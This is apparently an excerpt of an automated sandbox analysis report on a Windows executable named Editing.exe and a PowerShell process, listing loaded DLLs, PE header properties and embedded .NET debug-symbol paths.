Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Editing.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: Editing.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Editing.exeStatic file information: File size 38550125 > 1048576
Source: Editing.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: Editing.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: Editing.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157c00
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Editing.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Editing.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Editing.exe, 00000000.00000002.3212455724.00000284CCAC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212473659.00000284CCAD0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256P?> source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdbhP source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256t source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: Editing.exe, Editing.exe, 00000000.00000002.3236670998.00007FF647018000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Editing.exe, 00000000.00000002.3214300596.00000284CFC41000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214325112.00000284CFC60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Editing.exe, 00000000.00000002.3215940910.00000284D08D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211154010.0000024437CD1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Editing.exe, 00000000.00000002.3216283839.00000284D0A30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216261389.00000284D0A21000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Editing.exe, 00000000.00000002.3212183576.00000284CC9D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212225709.00000284CCA01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Editing.exe, 00000000.00000002.3214531779.00000284CFE11000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214552955.00000284CFE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Editing.exe, 00000000.00000002.3213935450.00000284CFAE0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3213770399.00000284CF971000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Memory.ni.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Editing.exe, 00000000.00000002.3214493572.00000284CFE00000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3210892163.00000244364D1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: Editing.exe, 00000000.00000002.3215920817.00000284D08B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3215900196.00000284D08A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Editing.exe, 00000000.00000002.3214222078.00000284CFBD1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214169569.00000284CFB80000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: Editing.exe, 00000000.00000002.3214846387.00000284CFF31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214801607.00000284CFF10000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: Editing.exe, 00000000.00000002.3214912074.00000284CFF61000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215091691.00000284D0130000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Editing.exe, 00000000.00000002.3214257265.00000284CFC20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214057906.00000284CFB01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Cryptography.ni.pdb source: Editing.exe, 00000000.00000002.3214347772.00000284CFC80000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214432901.00000284CFD41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: Editing.exe, 00000000.00000002.3215619881.00000284D0541000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215366959.00000284D0240000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: Editing.exe, 00000000.00000002.3213973895.00000284CFAF1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214871433.00000284CFF50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: Editing.exe, 00000000.00000002.3215281217.00000284D01B1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215234136.00000284D0180000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Private.DataContractSerialization/Release/net8.0/System.Private.DataContractSerialization.pdb source: Editing.exe, 00000000.00000002.3215019846.00000284D0051000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214933418.00000284CFF70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Editing.exe, 00000000.00000002.3216088459.00000284D09B0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216068311.00000284D09A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: Editing.exe
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: Editing.exe, 00000000.00000002.3213036029.00000284CD121000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212619407.00000284CCB30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: Editing.exe, 00000000.00000002.3215131916.00000284D0141000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215153387.00000284D0150000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Editing.exe, 00000000.00000002.3216145339.00000284D09D0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212913296.00000284CCFC8000.00000004.00000020.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216549510.00000284D0E41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: Editing.exe, 00000000.00000002.3215193208.00000284D0161000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215214561.00000284D0170000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Editing.exe, 00000000.00000002.3212165209.00000284CC9C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212254148.00000284CCA30000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdbSHA256 source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.NameResolution.ni.pdb source: Editing.exe, 00000000.00000002.3214735866.00000284CFED0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214672966.00000284CFEB1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Console.ni.pdb source: Editing.exe, 00000000.00000002.3212975104.00000284CD0C0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212597286.00000284CCB11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Editing.exe, 00000000.00000002.3214572685.00000284CFE30000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214620254.00000284CFE71000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: Editing.exe, 00000000.00000002.3212365601.00000284CCA90000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3212288969.00000284CCA41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Editing.exe, 00000000.00000002.3214089010.00000284CFB20000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3214140885.00000284CFB51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: Editing.exe, 00000000.00000002.3213884907.00000284CFA31000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213789653.00000284CF980000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Threading.ni.pdb source: Editing.exe, 00000000.00000002.3212506695.00000284CCAE1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212526014.00000284CCAF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Editing.exe, 00000000.00000002.3211317727.0000024437D40000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3211294592.0000024437D31000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\fri53hgi\fri53hgi.pdb source: powershell.exe, 00000004.00000002.2191077266.0000020A63B94000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Editing.exe, 00000000.00000002.3212402002.00000284CCAA1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212420646.00000284CCAB0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.ServicePoint.ni.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Specialized\Release\net8.0\System.Collections.Specialized.pdb source: Editing.exe, 00000000.00000002.3216124709.00000284D09C1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3216165832.00000284D09E0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.ServicePoint\Release\net8.0\System.Net.ServicePoint.pdb source: Editing.exe, 00000000.00000002.3216224267.00000284D0A10000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216204347.00000284D0A01000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.RegularExpressions\Release\net8.0\System.Text.RegularExpressions.pdb source: Editing.exe, 00000000.00000002.3215328342.00000284D01E1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3215842835.00000284D0840000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: Editing.exe, 00000000.00000002.3212344387.00000284CCA71000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3212307083.00000284CCA50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: Editing.exe, 00000000.00000002.3214715169.00000284CFEC1000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3214755813.00000284CFEE0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Primitives.ni.pdb source: Editing.exe, 00000000.00000002.3213703627.00000284CF931000.00000020.00001000.00020000.00000000.sdmp, Editing.exe, 00000000.00000002.3213728975.00000284CF950000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: Editing.exe, 00000000.00000002.3215961512.00000284D08F0000.00000004.10000000.00040000.00000000.sdmp, Editing.exe, 00000000.00000002.3216014096.00000284D0941000.00000020.00001000.00020000.00000000.sdmp
Source: Editing.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Editing.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Editing.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
